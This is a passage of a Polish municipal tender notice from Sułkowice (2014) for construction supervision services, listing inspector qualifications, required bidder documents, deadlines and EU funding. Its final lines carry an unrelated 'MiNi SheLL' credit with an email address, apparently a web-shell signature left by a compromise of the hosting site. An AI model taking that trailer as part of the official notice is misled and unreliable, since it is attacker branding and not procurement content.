b)Inspektor nadzoru robót konstrukcyjno - budowlanych - posiadający następujące kwalifikacje i doświadczenie: co najmniej 2 lata doświadczenia na stanowisku inspektora nadzoru lub kierownika budowy/robót w danej specjalności, posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2013, poz. 1409, ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578, ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do nadzorowania robót budowlanych w zakresie co najmniej specjalności konstrukcyjno -budowlanej;
c)Inspektor nadzoru robót elektrycznych i w zakresie AKPIA - posiadający następujące kwalifikacje i doświadczenie: co najmniej 2 lat doświadczenia na stanowisku inspektora nadzoru lub kierownika budowy/robót w danej specjalności,
posiadający uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z ustawą z dnia7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2013, poz. 1409, ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578, ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do nadzorowania robót budowlanych w zakresie co najmniej specjalności instalacyjno - inżynieryjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
d)Inspektor nadzoru robót drogowych - posiadający następujące 	kwalifikacje i doświadczenie: co najmniej 2 lata doświadczenia na stanowisku inspektora nadzoru lub kierownika budowy/robót w danej specjalności, posiadający uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi w specjalności drogowej, zgodnie z ustawą z dnia 7 lipca 1994 r. -Prawo budowlane (Dz. U. z 2013, poz. 1409, ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578, ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do nadzorowania robót budowlanych w zakresie co najmniej dróg;
Osoby wskazane do wykonywania niniejszego zamówienia muszą posługiwać się biegle językiem polskim lub dysponować na stałe tłumaczem języka polskiego.
Wymagane w tym punkcie okresy doświadczenia zawodowego, należy liczyć do upływu terminu składania ofert. Wymagany okres 2 -letniego doświadczenia zawodowego należy rozumieć jako okres łącznie 24 miesięcy pozostawania na wymaganym stanowisku w trakcie faktycznej realizacji robót.
Dane te powinny jasno wynikać z treści ujawnionej w załączniku nr 4a do oferty Wykonawcy, dlatego wymaga się podania dokładnych dat rozpoczęcia i zakończenia robót, którymi kierował dany specjalista.
Zamawiający dopuszcza łączenie funkcji Inspektora nadzoru robót konstrukcyjno-budowlanych z funkcją inspektora nadzoru robót drogowych, pod warunkiem spełnienia wymagań dla ww. osób. Zamawiający, określając wymogi dla osób w zakresie posiadanych uprawnień, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane ( t. j. Dz. U. z 2013 r., poz.1409 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach 	członkowskich  Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).
W celu udowodnienia spełnienia tak określonego warunku należy przedstawić Zamawiającemu
oświadczenia o spełnianiu warunków udziału w postępowaniu,  wykaz osób uczestniczących w realizacji zamówienia, zgodnie z treścią załącznika nr 4  i 4a do oferty, oświadczenia, iż osoby biorące udział w realizacji zamówienia posiadają wymagane prawem uprawnienia do realizacji zamówienia, zgodnie z treścią załącznika nr 5 do oferty. pisemnego zobowiązania innego podmiotu do udostępnienia zasobów (osób) niezbędnych do wykonania zamówienia ( jeżeli dotyczy) Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, których wykaz zawiera rozdział 6 niniejszej specyfikacji (patrz tabela). Nie spełnienie któregokolwiek z warunków wskazanych w niniejszej SIWZ spowoduje wykluczenie Wykonawcy (odrzucenie oferty).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zaparafowany wzór umowy; 2. Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sulkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sułkowicach
32-440 Sułkowice, Rynek 1
pokój nr 119 - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2014 godzina 10:00, miejsce: Urząd Miejski w Sułkowicach
32-440 Sułkowice , Rynek 1
dziennik podawczy - pokój nr 01 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach projektu Program zaopatrzenia w wodę oraz odprowadzania i oczyszczania ścieków w Gminie Sułkowice - część I, który uzyskał dofinansowanie z Funduszu Spójności na warunkach określonych w umowie POIS.01.01.00 - 00 - 193/09 - 00 ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com